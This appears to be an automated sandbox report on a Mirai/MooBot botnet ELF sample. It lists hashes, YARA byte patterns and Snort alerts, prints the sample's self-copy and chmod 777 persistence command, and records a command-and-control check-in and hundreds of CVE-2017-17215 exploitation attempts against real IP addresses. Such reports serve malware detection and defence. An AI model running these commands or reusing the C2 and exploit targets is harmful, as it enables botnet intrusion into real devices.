Linux Analysis Report
XHZFo8hExw.elf

Overview

General Information

Sample Name: XHZFo8hExw.elf
Original Sample Name: f90025024613f3a9d54373f3cc68eefd.elf
Analysis ID: 830724
MD5: f90025024613f3a9d54373f3cc68eefd
SHA1: b44c167b326ff981979a38c1086cebe9d27feb66
SHA256: d502542baec72142eef5bbe366c81681acaca46c920c37c724d2cd0b8a93a223
Tags: 32, elf, intel, mirai
Infos:

Detection

Mirai, Moobot
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Analysis Advice

None of the HTTP servers contacted by the sample answered. The sample is likely an old dropper which no longer works.
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830724
Start date and time: 2023-03-20 16:35:09 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 32s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample file name: XHZFo8hExw.elf
Original Sample Name: f90025024613f3a9d54373f3cc68eefd.elf
Detection: MAL
Classification: mal96.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: XHZFo8hExw.elf
Command: /tmp/XHZFo8hExw.elf
PID: 6226
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
done.
Standard Error: sh: 1: cannot open : No such file
  • system is lnxubuntu20
  • XHZFo8hExw.elf (PID: 6226, Parent: 6119, MD5: f90025024613f3a9d54373f3cc68eefd) Arguments: /tmp/XHZFo8hExw.elf
    • sh (PID: 6227, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv */tmp/XHZFo8hExw.elf <\\xc0\\xbc\\xff\\x84\\x83\\x86\tbin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6228, Parent: 6227)
      • rm (PID: 6228, Parent: 6227, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6229, Parent: 6227)
      • mkdir (PID: 6229, Parent: 6227, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6230, Parent: 6227)
      • chmod (PID: 6230, Parent: 6227, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name: MooBot
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
Source | Rule | Description | Author | Strings
XHZFo8hExw.elf | JoeSecurity_Moobot | Yara detected Moobot | Joe Security
XHZFo8hExw.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
XHZFo8hExw.elf | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
XHZFo8hExw.elf | Linux_Trojan_Gafgyt_5bf62ce4 | unknown | unknown
  • 0xa011:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
XHZFo8hExw.elf | Linux_Trojan_Mirai_b14f4c5d | unknown | unknown
  • 0x45e0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
Source | Rule | Description | Author | Strings
6226.1.0000000008048000.0000000008056000.r-x.sdmp | JoeSecurity_Moobot | Yara detected Moobot | Joe Security
6226.1.0000000008048000.0000000008056000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
6226.1.0000000008048000.0000000008056000.r-x.sdmp | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
6226.1.0000000008048000.0000000008056000.r-x.sdmp | Linux_Trojan_Gafgyt_5bf62ce4 | unknown | unknown
  • 0xa011:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6226.1.0000000008048000.0000000008056000.r-x.sdmp | Linux_Trojan_Mirai_b14f4c5d | unknown | unknown
  • 0x45e0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
Timestamp | SID | Protocol | Source | Destination | Classtype
03/20/23-16:35:53.346108 | 2030490 | TCP | 192.168.2.23:51628 | 103.161.181.97:56999 | A Network Trojan was detected
03/20/23-16:36:47.049175 | 2835222 | TCP | 192.168.2.23:56256 | 156.224.11.114:37215 | A Network Trojan was detected
03/20/23-16:36:24.420831 | 2835222 | TCP | 192.168.2.23:40986 | 41.237.5.201:37215 | A Network Trojan was detected
03/20/23-16:36:24.331963 | 2835222 | TCP | 192.168.2.23:39570 | 157.122.72.69:37215 | A Network Trojan was detected
03/20/23-16:37:00.531602 | 2835222 | TCP | 192.168.2.23:39590 | 41.36.233.70:37215 | A Network Trojan was detected
03/20/23-16:37:21.136876 | 2835222 | TCP | 192.168.2.23:32976 | 147.46.79.137:37215 | A Network Trojan was detected
03/20/23-16:37:52.298836 | 2030489 | TCP | 103.161.181.97:56999 | 192.168.2.23:51628 | A Network Trojan was detected
03/20/23-16:36:06.532616 | 2835222 | TCP | 192.168.2.23:39574 | 197.39.68.98:37215 | A Network Trojan was detected
03/20/23-16:36:24.422131 | 2835222 | TCP | 192.168.2.23:40988 | 41.237.5.201:37215 | A Network Trojan was detected
03/20/23-16:36:58.418193 | 2835222 | TCP | 192.168.2.23:59410 | 154.38.241.212:37215 | A Network Trojan was detected
03/20/23-16:37:32.803566 | 2835222 | TCP | 192.168.2.23:57594 | 197.39.56.45:37215 | A Network Trojan was detected
03/20/23-16:36:00.398384 | 2835222 | TCP | 192.168.2.23:46574 | 27.0.158.180:37215 | A Network Trojan was detected
03/20/23-16:36:12.950349 | 2835222 | TCP | 192.168.2.23:44976 | 41.239.113.31:37215 | A Network Trojan was detected
03/20/23-16:37:53.743391 | 2835222 | TCP | 192.168.2.23:39134 | 163.15.165.22:37215 | A Network Trojan was detected


          AV Detection

Source: XHZFo8hExw.elf, ReversingLabs: Detection: 58%
Source: XHZFo8hExw.elf, Joe Sandbox ML: detected

          Networking

Source: Traffic, Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:51628 -> 103.161.181.97:56999
Source: Traffic, Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.161.181.97:56999 -> 192.168.2.23:51628
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46574 -> 27.0.158.180:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39574 -> 197.39.68.98:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44976 -> 41.239.113.31:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39570 -> 157.122.72.69:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40986 -> 41.237.5.201:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40988 -> 41.237.5.201:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56256 -> 156.224.11.114:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59410 -> 154.38.241.212:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39590 -> 41.36.233.70:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57594 -> 197.39.56.45:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32976 -> 147.46.79.137:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39134 -> 163.15.165.22:37215
Source: global traffic, TCP traffic: 197.128.70.122 ports 1,2,3,5,7,37215
Source: global traffic, TCP traffic: 197.7.38.32 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.139.26.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.250.171.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.216.53.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 135.174.116.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.228.134.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.154.64.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.126.84.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 164.125.240.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.4.101.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 124.1.248.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.4.30.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 143.192.147.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 1.215.45.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.27.81.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.17.192.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.74.162.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 84.148.54.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.253.134.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.232.202.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 52.245.230.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.200.98.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 88.211.179.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.188.207.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.90.16.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.130.149.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.175.164.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.6.157.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 189.119.248.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.94.238.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.205.114.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.132.229.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.255.142.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.136.220.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 23.217.200.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.198.213.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.188.22.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.54.135.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.112.204.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.160.62.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.129.120.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.128.70.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 193.3.39.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 114.175.231.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 32.77.149.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.104.50.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.110.26.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.72.196.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.181.191.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.139.111.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.105.119.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.254.21.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 190.135.62.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.255.254.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.138.22.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.40.209.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.248.142.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 147.109.246.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.230.243.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.135.81.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.196.70.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.245.169.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 77.189.203.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.19.254.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.229.110.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.183.191.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.156.122.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.80.130.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 165.137.184.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 114.9.202.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.145.195.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.211.95.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.226.150.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.147.39.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.93.99.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.27.253.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.209.208.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.129.195.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 111.93.131.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 75.179.114.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.242.140.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.111.71.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.135.136.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.52.179.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.203.165.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.56.36.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.241.31.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 120.160.217.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 173.96.244.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.245.69.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:51628 -> 103.161.181.97:56999
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.122.229.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 152.156.88.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.78.124.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.252.106.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 59.8.224.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.162.54.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.163.250.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 132.208.183.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.82.10.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 136.56.57.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.20.90.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.46.78.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.194.25.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.87.66.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.37.90.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 136.238.64.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 69.74.34.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 34.43.17.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.20.39.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.117.59.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 52.137.36.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.18.8.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.154.65.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.20.83.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.43.215.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.32.0.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 40.166.16.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.63.109.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.49.226.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 209.129.14.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.64.37.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.164.77.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.127.183.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.24.180.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.240.140.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.151.214.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.247.96.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.92.81.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.181.144.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.38.120.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.143.110.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.57.23.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 116.247.219.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 122.57.80.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.135.147.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.9.252.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.38.28.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.241.97.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.201.79.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.250.215.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.125.115.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.90.185.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.64.163.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.240.232.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 175.107.192.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 85.20.236.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 126.65.129.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 106.157.138.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.124.168.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 111.222.91.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.182.65.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.202.148.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.212.129.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.240.129.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.54.188.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 108.82.199.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.170.152.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.204.183.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.150.81.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.14.137.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.34.52.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.10.240.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.57.154.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.46.175.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.136.152.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 132.160.4.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.142.111.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.6.90.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.24.59.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 43.17.154.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.5.223.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.220.254.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.179.209.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.153.35.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.101.44.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.28.222.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.40.121.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.253.48.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.76.138.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.127.202.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 59.222.24.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.103.77.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.50.188.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.228.114.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.121.216.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 152.76.142.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 151.6.250.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 160.228.64.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 47.152.109.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 162.181.69.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.222.73.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 58.224.114.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.138.171.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.167.105.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.162.29.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.195.227.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.238.240.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.147.225.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 19.200.164.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 77.22.152.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 4.31.71.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.63.211.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 119.122.241.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.88.85.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.148.131.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.70.214.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.21.113.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.240.151.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.9.114.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.8.48.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.122.129.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 175.43.111.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.179.158.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.70.201.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.199.18.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.241.27.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.110.128.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.108.105.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.149.8.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.88.179.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.150.238.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.58.172.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.90.233.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.229.71.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.102.57.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 189.87.87.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.85.71.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.151.213.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 171.66.45.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.15.80.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.167.216.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.172.226.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.205.239.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 191.67.40.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 100.173.36.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.135.247.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.13.51.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.36.15.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.170.163.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.179.129.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.98.231.180:37215
